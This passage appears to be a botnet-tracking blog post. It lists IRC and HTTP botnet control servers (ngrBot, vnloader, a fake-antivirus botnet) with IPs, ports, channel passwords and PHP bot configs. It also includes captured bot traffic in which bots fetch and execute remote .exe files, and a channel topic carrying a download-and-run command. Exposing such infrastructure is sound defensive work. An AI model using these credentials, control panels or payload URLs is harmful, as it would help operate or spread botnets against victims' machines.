Panel URL: http://22079a17.urlbeat.net
Exe file used to infect: http://d5243fd7.filesonthe.net
Hosting info: http://whois.domaintools.com/69.162.107.11
safetysamvps.info (IRC botnet hosted in United States Walnut Psychz Networks)
safetysamvps.info 199.119.201.232
Server: 199.119.201.232:6667
Server Password:
Username: Catalyst21
Nickname: n{DEU|XP-32}214249
Channel: #Catalyst (Password: )
Channel topic:
Now talking in #catalyst
Topic On: [ #catalyst ] [ IRC ]
Topic By: [ Execute ]
Hosting info: http://whois.domaintools.com/199.119.201.232
api.trafficnum.net (IRC botnet hosted in United States San Antonio Slicehost)
api.trafficnum.net 184.106.152.29
Server: 184.106.152.29:2345
Server Password:
Username: x
Nickname: n[DEU|XP]7983462
Channel: #!prbla! (Password: )
Channel topic: :.m /125/125/85/84/52/33/11/110/108/114/59/118/70/112/100/115/112/96/55/69/127/100/42/54/28/33/17/63/48/51/
Topic By: [ spin ]
Hosting info: http://whois.domaintools.com/184.106.152.29
88.13.254.233 (ngrBot hosted in Spain Telefonica De Espana)
Remote Host      Port Number
199.15.234.7     80
50.17.217.128    80
83.233.33.6      80
88.13.254.233    4242

PASS secret
PRIVMSG ##n :[DNS]: Blocked 1310 domain(s) - Redirected 0 domain(s)
NICK n{US|XPa}egiruwp
USER egiruwp 0 0 :egiruwp
PONG :ED4B405C
JOIN ##n secret
PRIVMSG ##n :[d="http://dl.dropbox.com/u/40789812/Comet1185501.exe" s="279040 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0

Hosting info: http://whois.domaintools.com/88.13.254.233
92.241.130.174 (vnloader hosted in Bosnia And Herzegovina Banja Luka Aneks D.o.o)
Panel here:
http://92.241.130.174/vn/
http://92.241.130.174/vn/bot/
This malware is for sale on hecking boards.
Hosting info: http://whois.domaintools.com/92.241.130.174
duffiduffid.ru (HTTP botnet hosted in Bulgaria Sofia Bulgarian Telecommunications Company Plc)
This HTTP botnet is a very big one: a FAKE ANTIVIRUS whose infected machines connect over HTTP to report infections or download files.
Control panel here:
http://www.duffiduffid.ru/stat/
http://www.duffiduffid.ru/stat/stat3.php
Resolved : [duffiduffid.ru] To [82.210.157.9]
Resolved : [duffiduffid.ru] To [113.161.87.176]
Resolved : [duffiduffid.ru] To [71.217.16.11]
Resolved : [duffiduffid.ru] To [60.19.30.135]
Resolved : [duffiduffid.ru] To [87.126.200.246]
Hosting info: http://whois.domaintools.com/87.126.200.246
69.162.81.123 (Linux bots hosted in United States Van Nuys Limestone Networks Inc)
var $config = array("server"=>"69.162.81.123", "port"=>2221, "pass"=>"lol1", "prefix"=>"[NkD]-", "maxrand"=>8, "chan"=>"#nkd", "key"=>"", "modes"=>"+iB-x", "password"=>"123", "trigger"=>".", "hostauth"=>"*"
var $config = array("server"=>"69.162.81.123", "port"=>2222, "pass"=>"mgn22", "prefix"=>"BOTN3T|", "maxrand"=>8, "chan"=>"#magno", "key"=>"", "modes"=>"+iB-x", "password"=>"soufoda", "trigger"=>".", "hostauth"=>"*"
Hosting info: http://whois.domaintools.com/69.162.81.123
146.0.73.82 (ngrBot hosted in Netherlands Amsterdam Hostkey B.v)
The noob is xGoogle from hackforums; he has like 6 leafs and he thinks he's a hecker lol. Every botnet in the blog which uses port 1888 is from him.

Remote Host      Port Number
146.0.73.82      1888
PASS strike
199.101.133.57   80
199.15.234.7     80
70.38.98.239     80

PRIVMSG #XP :[d="http://img105.herosh.com/2011/10/23/296108402.gif" s="81920 bytes"] Executed file "C:\Documents and Settings\UserName\Application
31.214.201.171 (ngrBot hosted in Germany Marcel Edler Trading As Optimate-server)
Remote Host      Port Number
199.15.234.7     80
31.214.201.171   1888

PASS strike
NICK n{US|XPa}dciaump
USER dciaump 0 0 :dciaump
JOIN #asdf strike
Now talking in #asdf
Topic On: [ #asdf ] [ ~pu http://dc429.4shared.com/download/IwwpPGS9/sdafsdfad54534.exe b8b96e49511c4b1c70211be8a3968240 ~s -o ~s ]
Topic By: [ google ]
JOIN #XP
JOIN #US

Hosting info: http://whois.domaintools.com/31.214.201.171
146.0.73.83 (ngrBot hosted in Netherlands Amsterdam Hostkey B.v)
Remote Host      Port Number
146.0.73.83      1888
PASS strike
199.15.234.7     80
70.38.98.238     80

NICK n{US|XPa}wdpvgfm
USER wdpvgfm 0 0 :wdpvgfm
JOIN #asdf strike
JOIN #XP
JOIN #US
PRIVMSG #XP :[d="http://img104.herosh.com/2011/10/21/2578445.gif" s="81920 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.exe" - Download retries: 0

The data identified by the following URLs was then requested from the remote web